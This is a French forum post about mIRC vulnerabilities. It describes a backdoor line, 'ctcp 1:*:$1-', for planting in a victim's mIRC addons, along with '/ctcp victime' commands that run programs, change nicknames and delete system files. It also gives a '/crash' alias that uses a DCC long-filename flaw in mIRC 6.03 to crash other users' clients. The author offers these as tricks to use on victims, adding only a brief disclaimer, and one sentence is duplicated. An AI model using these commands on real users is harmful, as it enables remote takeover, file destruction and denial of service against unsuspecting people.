Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilAccueil  PortailPortail  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  Connexion  
Le Deal du moment : -21%
LEGO® Icons 10329 Les Plantes Miniatures, ...
Voir le deal
39.59 €

 

 Failles Mirc :

Aller en bas 
AuteurMessage
NouNou_
Admin
NouNou_


Nombre de messages : 108
Localisation : MontreaL - NapoLi
Date d'inscription : 05/03/2005

Failles Mirc : Empty
MessageSujet: Failles Mirc :   Failles Mirc : EmptyDim 9 Oct à 6:50

Avec une simple ligne de code, n'importe qui peut controler votre mIRC, avec un acces complet sur votre ordinateur.
Cette manipulation ou astuce est trop facile a faire , faut juste ecrire ou recevoir une ligne de code suivante :


ctcp 1:*:$1-

Une fois que quelqun aura loader l'addon on peut faire ce qu'on veut .Pour mettre cette ligne en fonction il suffit de taper :

/ctcp "pseudo" "la commande"

Comme par exemple :

/ctcp victime run C:\WINDOWS\SOL.EXE ( Pour qu'il aille jouer un peu au solitaire)
/ctcp victime nick je-suis-con ( change le pseudo de la personne )
/ctcp victime remove c:\windows\system\exemple.exe ( ca efface les fichiers selectionnes! ) .....

Pour plus de commandes reportez-vous a l'aide Mirc.

Jusque la tout baigne maintenant je vais vous citez les "contraintes " :

* La victime peut voir votre IP dans la fenetre status!
* La victime peut toujours deconnecter et ainsi stopper tout.
* On peut tomber sur quelqun qui est doue en scripting et la ca etre votre tour de subbir les consequances Razz:P (vous etes avertis)

Pour finir en beaute comme on dit , je vous suggere une commande trop efficace ; une commande qui efface le statut.
C'est la commande:
/ctcp "pseudo de la personne" clear -s

Autres Failles sous Mirc :

Faille mIRC 6.03

Grace a la commande si dessous qui est facillement ajoutable dans les aliases un utilisateurs peut faire begue un script en utilisant une faille dans la base de mIRC 6.03... sauf le mIRC 6.12. La faille est au niveau des dcc si un utilisateurs peut faire begue un script en utilisant une faille dans la base de mIRC 6.03... sauf le mIRC 6.12. La faille est au niveau des dcc si
l'utilisateur en face a en attente un fichier dcc avec un nom de plus de 250 caracter ca lui fait begue ca basse mIRC.


/crash { raw PRIVMSG $1 $+(:,$chr(1),DCC) send"$+ $str($rand(a,z)
$+ $chr(32),250) $+"0 2130706433 $+(8192,$chr(1)) }


La seul facon d'y remedie c'est en rajoutant ou en tapant /ignore -wd *


Rappel: Cette rubrique est faites seulement pour votre information des risques et perils de l'utilisation et si on vous g-lined, killed... ne venez pas vous plaindre aupres de moi Razz
Revenir en haut Aller en bas
 
Failles Mirc :
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Le Glossaire mots techniques Mirc :

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
 :: Catégorie à modifier... :: Internet Relay Chat (IRC) :-
Sauter vers: